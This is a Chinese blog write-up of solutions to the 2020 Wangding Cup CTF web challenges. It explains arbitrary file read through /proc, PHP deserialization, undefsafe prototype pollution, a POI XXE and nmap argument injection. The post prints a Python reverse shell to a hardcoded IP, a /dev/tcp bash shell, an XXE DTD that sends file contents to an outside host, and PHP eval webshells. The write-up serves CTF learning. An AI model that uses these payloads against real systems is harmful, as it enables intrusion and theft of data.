2020 网鼎杯web复现

最新推荐文章于 2023-03-11 11:30:03 发布
最新推荐文章于 2023-03-11 11:30:03 发布
阅读量746 收藏 3
点赞数
分类专栏: ctf 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/106204479
版权

复现平台buuctf

白虎组:

1.PicDown

本题是任意文件下载

尝试下载/proc/self/comline

得到提示 python2 app.py (原题应该是main.py这里可能是复现环境的差异)

下载app.py,代码审计

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

不难看出:路由 /no_one_know_the_manager 下存在命令执行,且要求SECRET_KEY =key(输入值)

SECRET_KEY的值存放在/tmp/secret.txt中,但是该文件已经被删除了,因此我们无法下载文件。

在 linux 系统中如果一个程序打开了一个文件没有关闭,即便从外部(上文是利用 os.remove(SECRET_FILE))删除之后,在 /proc 这个进程的 pid 目录下的 fd 文件描述符目录下还是会有这个文件的 fd,通过这个我们即可得到被删除文件的内容

尝试访问/proc/self/fd/3 得到SECRET_FILE

注:buu环境下这个key需要进行url加密才行,但实际题目环境应该不需要

将key进行替换,然后访问这个no_one_know_the_manager的路由,果然可以执行,但是没有回显。反弹个shell就好。

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("174.1.93.196",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在根目录下发现flag,成功获取flag

 

 

青龙组

1.AreUSerialz

访问题目,发现是一个代码审计。

 <?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

简单分析一下代码逻辑:

1.通过传入参数str来执行反序列化。(代码中提示了flag.php,我们的目标应该就是获取该文件的内容)

2.str会通过is_valid的函数进行过滤,该函数会阻止输入特殊字符,题目给的类中的函数为private属性,序列化后会产生特殊字符我们需要对其进行绕过。

3.反序列化会触发__destruct()函数,该函数会触发process()函数。

4.process()函数  当op=2时候, 触发read()函数可以读取flag.php的内容,再通过output函数输出

5.__destruct()函数和process()函数中,分别存在过滤,必须同时满足这2个条件。

if($this->op === "2")
            $this->op = "1";

if($this->op == "2") {
            $res = $this->read();
            $this->output($res);

这里我们可以令op=2就可以实现绕过。

注:绕过原理是由于强类型比较下2!=“2”,但在弱类型比较下 2==“2”进行比较时,“2”会被认为是一个数字进行比较,因此相等。

本地构造一个序列化数据,内容如下

O:11:"FileHandler":3:{s:5:"%00*%00op";i:2;s:11:"%00*%00filename";s:8:"flag.php";s:10:"%00*%00content";N;}

但是is_valid函数会阻止程序,因为这里的%00对应的ascii 0字符超过了范围。我们可以用S属性来绕过

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:8:"flag.php";S:10:"\00*\00content";N;}

注:S模式下,字符可以用/+16进制来表示。%00就可以用\00来表示。

查看源码,成功获取flag

 

2.Notes

一道代码审计题,打开源码审计一下,发现可执行命令的函数,该函数会执行commands里面包含的命令。但是这里的commands变量是一个不可操作的变量

app.route('/status')
    .get(function(req, res) {
        let commands = {
            "script-1": "uptime",
            "script-2": "free -m"
        };
        for (let index in commands) {
            exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {
                if (err) {
                    return;
                }
                console.log(`stdout: ${stdout}`);
            });
        }
        res.send('OK');
        res.end();
    })

 

const undefsafe = require('undefsafe');

这里的解决方法就是原型链污染。undefsafe包在<2.0.3版本下存在原型链污染漏洞。

可以参考https://snyk.io/vuln/SNYK-JS-UNDEFSAFE-548940

我们可以通过污染commands这个字典来达到执行命令的目标

    edit_note(id, author, raw) {
        undefsafe(this.note_list, id + '.author', author);
        undefsafe(this.note_list, id + '.raw_note', raw);
    }

app.route('/edit_note')
    .get(function(req, res) {
        res.render('mess', {message: "please use POST to edit a note"});
    })
    .post(function(req, res) {
        let id = req.body.id;
        let author = req.body.author;
        let enote = req.body.raw;
        if (id && author && enote) {
            notes.edit_note(id, author, enote);
            res.render('mess', {message: "edit note sucess"});
        } else {
            res.render('mess', {message: "edit note failed"});
        }
    })

/edit_note下可以传3个参数调用edit_note来进行原型链污染。

构造payload

id=__proto__&author=bash -i > /dev/tcp/ip/port 0>&1&raw=1

抓包构造

 访问/status页面,反弹shell

成功获取flag

3.filejava

简单测试一下,题目只有上传和下载功能。

因此尝试一下是否存在目录穿越和任意文件下载的问题。

抓包测试../1.txt ,回显正常,提示该文件不存在,证明该漏洞存在。

尝试../ ,报错返回了一个路径。

由于这是一个java的网站,我们可以尝试一下读取java的配置文件。web.xml

构造filename=../../../web.xml ,成功获取数据

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <servlet>
        <servlet-name>DownloadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>DownloadServlet</servlet-name>
        <url-pattern>/DownloadServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>ListFileServlet</servlet-name>
        <servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>ListFileServlet</servlet-name>
        <url-pattern>/ListFileServlet</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>UploadServlet</servlet-name>
        <servlet-class>cn.abc.servlet.UploadServlet</servlet-class>
    </servlet>

    <servlet-mapping>
        <servlet-name>UploadServlet</servlet-name>
        <url-pattern>/UploadServlet</url-pattern>
    </servlet-mapping>
</web-app>

这里尝试直接读取flag,构造filename=../../../../../../../../../flag.txt,flag果然在这儿,但是显示禁止读取,可能是文件权限不够,我们继续分析刚才的xml文件。

注:

1.web.xml包含程序处理的一些路由,虽然不能下载到java的原生文件,但是可以在对应的classes文件夹下获取对应的class文件,通过反编译就能查看源码。

2.这个的servlet-class就是对应编译好的文件的位置,其中.就是文件夹的分隔符/,cn.abc.servlet.ListFileServlet =cn/abc/servlet/ListFileServlet.class

3.java环境下,默认编译好的源码会保存在WEB-INF/classes文件夹下

构造filename=../../../classes/cn/abc/servlet/ListFileServlet.class ,依此下载这3个class文件,虽然直接打开是乱码,但是通过idea就能直接反编译看到源码。

接下来就是代码审计的工作。

发现UploadServlet下可能存在xxe漏洞。

if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
    try {
        Workbook wb1 = WorkbookFactory.create(in);
        Sheet sheet = wb1.getSheetAt(0);
        System.out.println(sheet.getFirstRowNum());
    } catch (InvalidFormatException var20) {
        System.err.println("poi-ooxml-3.10 has something wrong");
        var20.printStackTrace();
    }
}

这里是一个excel和xxe漏洞的结合,CVE-2014-3529,漏洞分析可以参考这篇文章https://www.jianshu.com/p/73cd11d83c30

大概的解法如下:

1.新建一个excel文件,后缀名改成zip

2.用解压软件打开,修改里面的[Conent_Tyoes].xml文件。在第二行添加如下代码。添加完后再将后缀改回xlsx

<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://ip/file.dtd">
%remote;%int;%send;
]>

3.在靶机的/var/www/html目录下新建file.dtd的文件,内容如下:

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip:9999?p=%file;'>">

 4.在靶机开始监听9999端口,命令如下:nc -lvvp 9999

成功获取flag

 

朱雀组

1.Nmap

简单来看就是执行Namp命令然后查看输出,这里有2个解题思路

1.将flag写入文件

-iL /flag -oN flag.txt

注:

-iL  如果你有大量的系统进行扫描,就可以在文本文件中输入IP地址(或主机名),并使用该文件作为输入

-oN 将扫描结果输入到指定文件中。

执行,访问flag.txt获取flag

2.写入shell

 ' <?php @eval($_POST["1"]);?> -oG 1.php'

但是文件写入被过滤,尝试phtml+短标签绕过写入成功

' <?= @eval($_POST["pd"]);?> -oG pd.phtml '

蚁剑连接,获取flag

 

2.phpweb

打开一看一段时间就会报错,查看源码,发现有2个传参,func和p,结合报错输出可以判断

func是输入的函数,p是对应的参数,抓包查看一下

果然是这样,测试一下,phpinfo和一些常规的执行函数被过滤了。

构造

func=file_get_contents&p=index.php成功获取源码。

    <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

注:按理说这个函数被过滤了但buu的环境下输出成功了,具体情况不清楚。

        网上都是这个payload:func=highlight_file&p=index.php

这里我们可以看见Test类,再配合__destruct函数,不难想到可以 通过反序列化执行。

构造如下反序列化数据:

<?php
 class Test {
        var $p = "find / -name flag*";
        var $func = "system";
}
$a = new Test();
echo serialize($a);
?>

查询到flag的位置

然后修改代码,读取flag即可。

 

玄武组

1.

fly夏天
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用numpy复现贝叶斯网络
10-16
适合学习机器学习算法入门 学习numpy开发机器学习算法
强网杯SQL题目复现php.zip
12-17
强网杯 强网杯SQL题目复现php.zip
2020网鼎杯网络安全夺旗赛半决赛题目源代码
11-29
2020网鼎杯网络安全夺旗赛半决赛题目源代码。 2020网鼎杯,网络安全夺旗赛,CTF, AWD PLUS, 源代码,题目复现,渗透复现
[网鼎杯 2020 青龙组]notes
qq_43801002的博客
05-11 1907
感谢蓝小俊师傅解惑! #题目: 直接给源码 app.js var express = require('express'); var path = require('path'); const undefsafe = require('undefsafe'); const { exec } = require('child_process'); var app = express(); class Notes { constructor() { this.owner = "who
网鼎杯-青龙组-Web-Wp
XunanSec的博客
05-26 1146
0x01 开局一张图 一看就知道让我们代码审计 对于这种一长串的源码,还是逐步来解把 首先的解题思路就是查看CTF题目的命名和代码函数 CTF题目这里命名为AreUSerialz,我反正一眼看不出什么端详,打的CTF比较少,直接看函数名字 在下面可以看到有一个unserialize()函数,那这一题基本上就是考反序列化的知识了。 我们整体的浏览一边代码,来看一下程序的大概走向。 <?php include("flag.php"); highlight_file(__FILE__); cl
刷题(第三周)
qq_62046696的博客
03-11 709
sess_根我们生成的sha256编码,上传进去了,还差那个文件是否存在,发现upload有mkdir(里面的就是/var/babyctf/$attr)这里的attr我们可以控制,目录!简单来说,file_exits,如果是文件目录都可以为true,文件上传保存在/var/babyctf/$attr/$username/文件名,如果attr=success.txt,那么sess就保存在它里面,最后更改phpsessID为我们上传的sha256的值。变成我们的flag不就可以了吗。s:3:"123";
CTFshow-菜狗杯-flask session伪造-抽老婆
qq_31415417的博客
01-02 1292
CTFshow-菜狗杯-flask session伪造-抽老婆
网鼎杯初赛--web1
unexpectedthing的博客
08-29 603
2022网鼎杯初赛web
[网鼎杯 2020 白虎组]PicDown
Yb_140的博客
11-19 102
文件包含+SECRET_KEY
解析php变量,浅析PHP变量解析复杂规则语法
weixin_30962449的博客
03-09 511
前言翻了好久前写过的关于php复杂语法变量解析的文章,发现很多地方存在问题。因此又查阅文档重新理解了一遍该语法,谈谈个人的理解,并记录在此。题目简析一道很早之前的题目,代码(简化):$str= @(string)$_GET['str'];eval('$str="'.addslashes($str).'";');通过eval执行php代码获得flag,addslashes函数将字符串中的特殊字符转义...
网鼎杯2020.txt
05-24
网鼎杯2020白虎组部分题目链接:https://pan.baidu.com/s/1_8iThteUQKj2jBg95nkzEQ 提取码:inrl
24年云曦考核web复现(部分)
最新发布
03-18
24年云曦考核web复现(部分)
网鼎杯2020 青龙组 -web
weixin_43610673的博客
05-16 1032
AreUSerialz <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $co
2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz
艺博东的博客
05-10 1万+
2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz http://94b1c2d4231f4b4bb92162d5e89dec8f5817750c48224380.cloudgame2.ichunqiu.com/ 进入网址 直接在URL后面输入: ?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resour
CTF赛题分析之 Flask 目录穿越
weixin_57543652的博客
01-09 882
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
网鼎杯一道web题(fakebook)
洞若观火
08-23 1万+
扫描: nikto扫描: 发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。 user.php.bak源码: &lt;?php class UserInfo {     public $name = "";     public $age = 0;     public $...
2020网鼎杯决赛题目和排名
weixin_49432744的博客
11-29 495
PHP花式绕过大全
热门推荐
fly夏天的博客
10-18 1万+
做了这么长的时间的ctf,现在总结一下自己做过的题,记录一下各种可能会存在绕过的php函数,持续跟新。 各位大佬可以一起交流♂交流。 1.preg_replace ($pattern , $replacement , $subject ) 其中 $pattern为正则表达式 $replacement为替换字符串 $subject 为要搜索...
cve-2020-9484 漏洞复现
08-09
CVE-2020-9484是Apache Tomcat容器中的一种身份验证绕过漏洞。要复现该漏洞,我们需要满足以下条件: 1. 安装Apache Tomcat服务器:首先需要在本地或远程环境中安装Apache Tomcat服务器。确保Tomcat版本为9.0.0.M1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值